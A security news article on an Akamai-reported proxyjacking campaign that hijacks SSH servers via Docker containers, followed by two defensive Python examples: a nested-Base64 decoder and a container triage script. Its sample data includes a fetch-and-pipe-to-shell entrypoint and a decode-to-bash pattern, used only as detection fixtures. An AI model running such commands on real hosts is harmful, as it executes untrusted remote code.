An active and lucrative cyber attack campaign has been discovered by researchers at the Akamai Security Intelligence Response Team (SIRT). The campaign involves threat actors compromising vulnerable Secure Shell (SSH) servers and launching Docker containers that hijack the victim's network bandwidth for financial gain. This emerging attack vector, known as proxyjacking, allows attackers to enlist victim servers into a peer-to-peer (P2P) proxy network without the owner's knowledge.
Proxyjacking involves threat actors using SSH for remote access to victim servers and then running malicious scripts that connect those servers to legitimate proxy networks, such as Peer2Profit or Honeygain. These networks pay users to share their unused internet bandwidth, and by enlisting victim servers, attackers can monetize the victims' bandwidth with minimal resource load and less chance of discovery than other methods, such as cryptomining, carry.
The researchers found that proxyjacking has the potential to earn cybercriminals hundreds of thousands of dollars per month in passive income. While the concept of proxyjacking is not entirely new, the ability to easily monetize it through mainstream companies is. This has led to an increase in proxyjacking attacks, posing a threat to both the corporate world and average consumers.
One of the advantages of proxyjacking for threat actors is the ability to hide their tracks by routing malicious traffic through multiple peer nodes before reaching its final destination. This makes it difficult for victims or researchers to pinpoint the origin of the nefarious activity, providing an attractive option for attackers looking to monetize their actions without facing consequences.
The researchers at Akamai identified the attack when an attacker established multiple SSH connections to one of their honeypots and ran a Bash script that had been Base64-encoded twice. Once decoded, the script turned the compromised system into a node in the proxy network, allowing the attacker to profit from the shared bandwidth. The script was written to be stealthy and robust: it checked for the tools it needed and fetched any that were missing, so it operated regardless of the software already installed on the victim host.
cURL, a command-line tool for transferring data between devices and servers, served as the main component of the proxyjacking process. If cURL was not present on the victim host, the script downloaded an unmodified copy of it on the attacker's behalf. Finally, the script launched a Docker container to run the proxy client and cleaned up after itself, leaving little trace on the host.
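The double Base64 encoding described above is a cheap obfuscation, and peeling it off is the first step of the analysis. The following Python is an added example (not Akamai's code and not the attacker's script): it builds a constructed, harmless stand-in for the final-stage script that merely probes for cURL and Docker the way the article says the real one did, wraps it in two layers of Base64, and then strips the layers back off until the result stops decoding cleanly. It also pulls out which tools the recovered script references, which is the kind of indicator that led the researchers to cURL in the first place.

```python
import base64
import binascii
import re

# Constructed stand-in for the attacker's final-stage script. It is NOT the real
# payload; it only checks for the two tools the article says the real script
# depended on (cURL and Docker).
INNER_SCRIPT = (
    "#!/bin/bash\n"
    "command -v curl >/dev/null 2>&1 || echo 'curl missing'\n"
    "command -v docker >/dev/null 2>&1 || echo 'docker missing'\n"
)

# Tool names worth flagging in a recovered script (assumed list for this example).
TOOLS_OF_INTEREST = ("curl", "wget", "docker", "base64")

_B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/=\s]+$")


def wrap_base64(text: str, layers: int = 2) -> str:
    """Encode text through `layers` rounds of Base64 (used only to build the sample)."""
    data = text.encode("utf-8")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


# The blob an analyst would lift out of something like
#   echo <blob> | base64 -d | base64 -d | bash
SAMPLE_BLOB = wrap_base64(INNER_SCRIPT, layers=2)


def peel_base64(blob: str, max_layers: int = 8) -> list[str]:
    """Strip nested Base64 layers, returning every decoded layer (innermost last).

    Decoding stops as soon as the current text contains characters outside the
    Base64 alphabet, fails strict decoding, or decodes to bytes that are not
    valid UTF-8. A shell script trips the alphabet check immediately because of
    characters such as '#', '!' and spaces, so plaintext is never "decoded" again.
    """
    layers: list[str] = []
    current = blob.strip()
    for _ in range(max_layers):
        if not _B64_ALPHABET.match(current):
            break
        compact = re.sub(r"\s", "", current)  # tolerate wrapped lines
        try:
            text = base64.b64decode(compact, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        layers.append(text)
        current = text.strip()
    return layers


def referenced_tools(script: str) -> set[str]:
    """Return which tools of interest a recovered script mentions as whole words."""
    return {t for t in TOOLS_OF_INTEREST if re.search(rf"\b{t}\b", script)}


if __name__ == "__main__":
    layers = peel_base64(SAMPLE_BLOB)
    print(f"{len(layers)} layer(s) peeled; recovered script:\n{layers[-1]}")
    print("tools referenced:", sorted(referenced_tools(layers[-1])))
```

Two things are worth noting in the design: `validate=True` makes `b64decode` reject stray characters instead of silently skipping them, which is what prevents plaintext from being mistaken for another encoding layer, and the layer cap keeps the loop bounded if a sample is crafted to decode indefinitely.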
To defend against proxyjacking attacks, organizations should monitor their networks for abnormal bandwidth usage. For this specific attack, organizations can list the Docker containers running on each host and identify any they did not deploy. If any are found, a thorough investigation should be conducted to determine how the script was uploaded and run, followed by a comprehensive clean-up.
A notable aspect of this attack is its use of the cURL tool, which has many legitimate uses and could easily go unnoticed in most environments. In this case, however, it was the initial artifact that led the researchers to investigate further. This highlights the importance of investigating all unusual artifacts, not just those already classified as malicious.
Additionally, organizations should keep their assets up to date and apply patches to applications as soon as they are available, particularly for vulnerabilities known to be exploited in the wild. Users with deeper knowledge of computer security can also remain vigilant by monitoring running containers, detecting anomalies in network traffic, and regularly running vulnerability scans.
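The container check recommended above is easy to script. The following Python is an added example (not Akamai's tooling): it triages the JSON that `docker ps --format '{{json .}}'` prints, one object per line, against an inventory of images the organization expects to be running. A container is reported if its image is not in that inventory, if the image name contains the name of a bandwidth-sharing service (the substrings are an assumption for this example, based on the services named in the article), or if its entrypoint downloads or decodes remote content with cURL, wget or base64, as the script in this campaign did. The sample `docker ps` output, image names, container IDs and the inventory are all constructed for the example.

```python
import json

# Constructed sample of `docker ps --no-trunc --format '{{json .}}'` output. The
# IDs, names and images are made up; only the field names match Docker's output.
SAMPLE_DOCKER_PS = """\
{"ID":"3f1c2a9b8d7e","Image":"nginx:1.25","Names":"web","Command":"\\"nginx -g 'daemon off;'\\"","Status":"Up 3 days"}
{"ID":"9a8b7c6d5e4f","Image":"example/peer2profit-client:latest","Names":"p2p_node","Command":"\\"/bin/sh -c ./client\\"","Status":"Up 2 hours"}
{"ID":"1b2c3d4e5f60","Image":"postgres:15","Names":"db","Command":"\\"docker-entrypoint.sh postgres\\"","Status":"Up 3 days"}
{"ID":"abcdef012345","Image":"alpine:3.18","Names":"stoic_curie","Command":"\\"sh -c 'curl -fsSL http://10.0.0.9/x | sh'\\"","Status":"Up 5 minutes"}
"""

# Images this (hypothetical) host is expected to run.
EXPECTED_IMAGES = {"nginx:1.25", "postgres:15"}

# Assumed name fragments of bandwidth-sharing clients (check the real image
# names used by these services in your environment).
PROXYWARE_HINTS = ("peer2profit", "honeygain")

# Tools in an entrypoint that fetch or decode remote content.
FETCH_TOOLS = ("curl", "wget", "base64")


def triage_containers(ps_json_lines: str, expected: set[str]) -> dict[str, list[str]]:
    """Map each suspicious container name to the reasons it was flagged.

    Containers whose image is in `expected` and that trip no other check are
    omitted from the result.
    """
    findings: dict[str, list[str]] = {}
    for line in ps_json_lines.splitlines():
        if not line.strip():
            continue
        container = json.loads(line)
        image = container["Image"]
        command = container.get("Command", "").lower()
        reasons: list[str] = []

        if image not in expected:
            reasons.append(f"image not in inventory: {image}")

        hits = [h for h in PROXYWARE_HINTS if h in image.lower()]
        if hits:
            reasons.append("proxyware image name: " + ", ".join(hits))

        tools = [t for t in FETCH_TOOLS if t in command]
        if tools:
            reasons.append("entrypoint fetches/decodes remote content: " + ", ".join(tools))

        if reasons:
            findings[container["Names"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage_containers(SAMPLE_DOCKER_PS, EXPECTED_IMAGES).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

In practice the inventory would come from the deployment system rather than a hard-coded set, and any hit should be followed by the investigation the article calls for: how the container got there, what else the same session ran, and whether an unexpected cURL binary was dropped alongside it.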
The discovery of this active proxyjacking campaign highlights the growing threat and need for awareness and mitigation. By understanding the attack vector and implementing appropriate defenses, organizations can better protect themselves from falling victim to these lucrative attacks.
